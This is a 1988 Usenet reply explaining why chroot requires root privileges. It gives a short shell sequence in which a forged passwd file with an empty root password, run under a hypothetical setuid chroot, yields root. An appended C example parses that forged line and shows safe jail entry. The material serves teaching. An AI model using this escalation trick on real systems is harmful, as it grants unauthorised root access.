Xref: utzoo news.admin:4108 news.sysadmin:1725 comp.mail.uucp:2389
Path: utzoo!utgpu!watmath!clyde!att!rutgers!mailrus!nrl-cmf!ames!vsi1!apple!epimass!jbuck
From: jbuck@epimass.EPI.COM (Joe Buck)
Newsgroups: news.admin,news.sysadmin,comp.mail.uucp
Subject: Re: Dangerous hole in Usenet!
Message-ID: <2683@epimass.EPI.COM>
Date: 29 Nov 88 20:01:39 GMT
References: <1971@van-bc.UUCP> <572@comdesign.CDI.COM> <5517@medusa.cs.purdue.edu> <561@redsox.UUCP> <215@twwells.uucp> <155@ecicrl.UUCP>
Reply-To: jbuck@epimass.EPI.COM (Joe Buck)
Organization: Entropic Processing, Inc., Cupertino, CA
Lines: 26

In article <155@ecicrl.UUCP> clewis@ecicrl.UUCP (Chris Lewis) writes:
>Secondly, can someone out there explain why chroot is privileged?  Or
>why /etc/chroot isn't setuid?  It seems pretty darn silly that some
>mechanism that can only be used for *reducing* access rights requires
>root permission. 

Picture this:

mkdir /tmp/etc /tmp/bin
cp /bin/sh /tmp/bin
# su has to be reachable inside the new root for the last command to
# find it (the original listing leaves this step out).  A hard link
# keeps the setuid bit that a cp by an ordinary user would lose.
ln /bin/su /tmp/bin/su
echo "root::0:0:Root:/:/bin/sh" > /tmp/etc/passwd
# chroot(8) changes the root first and only then execs "su", so su
# resolves to /tmp/bin/su and its /etc/passwd is /tmp/etc/passwd.
/etc/chroot /tmp su

The final command runs the "su" command with a root of /tmp.  It uses
the dummy password file created by the echo command, which has no
password for root.

You are now root, and you can do another chroot to gain access to the
whole system.

This is why chroot is privileged!
-- 
- Joe Buck	jbuck@epimass.epi.com, or uunet!epimass.epi.com!jbuck,
		or jbuck%epimass.epi.com@uunet.uu.net for old Arpa sites
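
Added example, not part of Joe Buck's post or of any system's su: the
following C makes the two halves of the argument concrete.  The first
half parses a passwd line the way su has to and shows that the forged
entry "root::0:0:Root:/:/bin/sh" yields uid 0 with an empty password
field, which an old su took to mean "no password set".  The second half
is the pattern a privileged program should follow when it does call
chroot(2): chdir() into the jail first so the working directory is not
left outside it, chroot("."), then drop supplementary groups, gid and
uid and confirm the drop stuck.  The function names, the struct and the
sample lines are assumptions made for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Hypothetical record type for this example: the fields of a passwd
 * line that su actually acts on. */
struct pwline {
    char name[32];
    char passwd[128];   /* "" means an empty password field */
    uid_t uid;
    gid_t gid;
    char shell[128];
};

/* Parse one "name:passwd:uid:gid:gecos:dir:shell" line.
 * Returns 0 on success, -1 if the line does not have exactly seven
 * fields or its uid/gid are not numbers. */
int parse_passwd_line(const char *line, struct pwline *out)
{
    char buf[512];
    char *fields[7];
    char *p = buf, *end;
    unsigned long n;
    int i;

    if (strlen(line) >= sizeof buf) return -1;
    strcpy(buf, line);
    buf[strcspn(buf, "\n")] = '\0';
    for (i = 0; i < 7; i++) {
        fields[i] = strsep(&p, ":");
        if (fields[i] == NULL) return -1;   /* too few fields */
    }
    if (p != NULL) return -1;               /* too many fields */

    n = strtoul(fields[2], &end, 10);
    if (*fields[2] == '\0' || *end != '\0') return -1;
    out->uid = (uid_t)n;
    n = strtoul(fields[3], &end, 10);
    if (*fields[3] == '\0' || *end != '\0') return -1;
    out->gid = (gid_t)n;

    snprintf(out->name, sizeof out->name, "%s", fields[0]);
    snprintf(out->passwd, sizeof out->passwd, "%s", fields[1]);
    snprintf(out->shell, sizeof out->shell, "%s", fields[6]);
    return 0;
}

/* The decision the forged entry exploits: an empty password field
 * means no password is required, so su would hand out the shell. */
int empty_password(const struct pwline *pw)
{
    return pw->passwd[0] == '\0';
}

/* How a privileged program should enter a chroot jail.  Refuses to stay
 * root inside the jail, because a root process can chroot() its way
 * back out.  Returns 0 on success, -1 with errno set on failure; as a
 * non-root user chroot() itself fails with EPERM. */
int enter_jail(const char *root, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) { errno = EINVAL; return -1; }
    if (chdir(root) != 0) return -1;     /* cwd inside the jail first */
    if (chroot(".") != 0) return -1;     /* then move the root */
    if (setgroups(0, NULL) != 0) return -1;
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;
    if (setuid(0) == 0) { errno = EPERM; return -1; }  /* drop failed */
    return 0;
}

int main(void)
{
    /* Constructed sample: the line the echo in the post writes. */
    const char *forged = "root::0:0:Root:/:/bin/sh";
    struct pwline pw;

    if (parse_passwd_line(forged, &pw) == 0)
        printf("%s: uid=%lu gid=%lu shell=%s password required: %s\n",
               pw.name, (unsigned long)pw.uid, (unsigned long)pw.gid,
               pw.shell, empty_password(&pw) ? "no" : "yes");

    /* Demonstration only: as root this really jails the process in /tmp
     * as uid/gid 65534 (nobody on many systems); unprivileged it reports
     * EPERM from chroot(). */
    if (enter_jail("/tmp", 65534, 65534) != 0)
        printf("enter_jail: %s\n", strerror(errno));
    else
        printf("jailed in /tmp as uid %lu\n", (unsigned long)getuid());
    return 0;
}
```

The ordering in enter_jail is the point a reviewer looks for in any
program that calls chroot(2): chdir() before chroot(), privilege dropped
after, and a check that the drop stuck.  None of that helps if the
binary that calls chroot is setuid and lets the caller pick both the new
root and the command, which is exactly Chris Lewis's proposed setuid
/etc/chroot and exactly what the su trick in the post abuses.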